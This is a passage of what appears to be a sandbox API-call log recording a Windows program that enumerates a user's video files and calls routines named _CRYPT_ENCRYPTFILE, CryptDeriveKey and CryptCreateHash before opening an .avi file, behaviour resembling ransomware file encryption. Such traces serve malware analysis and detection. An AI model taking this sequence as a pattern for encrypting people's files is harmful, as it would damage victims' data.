Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LiHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iHe dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="He dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dQIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QIhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IhO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hO\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vgCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gCMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MnA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nA4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sdU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dU WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0197.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" WVhA.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0197.818] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.818] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0197.819] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0197.819] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.819] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.819] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.819] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.819] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.819] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.819] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x488a35b0, ftCreationTime.dwHighDateTime=0x1d5e67f, ftLastAccessTime.dwLowDateTime=0xa475b570, ftLastAccessTime.dwHighDateTime=0x1d5e0f3, ftLastWriteTime.dwLowDateTime=0xa475b570, ftLastWriteTime.dwHighDateTime=0x1d5e0f3, nFileSizeHigh=0x0, nFileSizeLow=0x139cc, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="vgCMnA4csdU WVhA.avi", cAlternateFileName="VGCMNA~1.AVI")) returned 0x90ae18 [0197.819] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.820] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.820] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.820] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.820] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.820] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.820] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.820] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0197.820] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.820] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0197.820] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.820] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.821] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.821] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.821] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.821] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0197.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.821] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0197.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.822] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0197.822] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.822] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.822] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.823] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.823] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.823] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.823] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.823] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.823] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.823] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0197.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.823] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.823] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.823] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.823] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.823] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.823] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.823] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.824] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.824] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.824] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.824] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.824] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.824] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0197.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.824] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.834] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0197.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.834] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.834] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.834] CryptHashData (hHash=0x90af58, pbData=0x8dec68, dwDataLen=0x19, dwFlags=0x1) returned 1 [0197.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.835] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.835] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.835] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.835] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.835] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0197.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.835] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.835] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.835] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0197.835] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.836] CryptDestroyHash (hHash=0x90af58) returned 1 [0197.836] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.836] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.836] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.836] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.836] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.836] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\op gi7lihe dqiho\\vgcmna4csdu wvha.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.837] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.837] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0197.837] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0197.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0197.838] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0197.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0197.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 